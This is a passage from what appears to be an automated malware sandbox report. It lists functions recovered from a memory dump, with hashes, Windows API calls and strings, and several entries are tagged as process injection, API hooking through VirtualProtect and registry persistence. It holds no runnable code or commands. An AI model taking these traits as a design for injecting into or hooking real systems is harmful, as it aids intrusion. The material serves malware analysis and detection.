  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D81E6, Relevance: 7.5, APIs: 5, Instructions: 35 Total matches: 108
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1473, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61 Total matches: 61memory
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D74F7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57 Total matches: 53
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA6B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3ACC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE37D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44 Total matches: 70
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CC42B, Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 262 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF4FD, Relevance: 6.2, APIs: 4, Instructions: 192 Total matches: 92string
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC212, Relevance: 6.1, APIs: 4, Instructions: 108 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE3AA, Relevance: 6.1, APIs: 4, Instructions: 104 Total matches: 59stringtime
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E94, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 97 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D892D, Relevance: 6.1, APIs: 4, Instructions: 93 Total matches: 207
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6604, Relevance: 6.1, APIs: 4, Instructions: 83 Total matches: 29memoryregistry
Similarity
  • Total matches: 29
  • API ID: HeapFreeRegisterWaitForSingleObjectRtlAllocateHeapmemcpy
  • String ID:
  • API String ID: 1976740423-0
  • Opcode ID: 00e719380342739fce2d9a83077352ae1e8e636be9c83fb6a114a482fd48beda
  • Instruction ID: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
  • Opcode Fuzzy Hash: 8CF059B0118943C9E83B20D21991BBEAB423F935CBC0E4631E40308A4F1E4762B63A98
  • Instruction Fuzzy Hash: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C665D
  • memcpy.NTDLL(00000018,?,?), ref: 001C6686
  • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_00005549,00000000,000000FF,00000008), ref: 001C66C5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C66D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE0EE, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 60
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7262, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 95string
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7664, Relevance: 6.1, APIs: 4, Instructions: 74 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C28FD, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 55registrystring
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D799E, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 87string
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
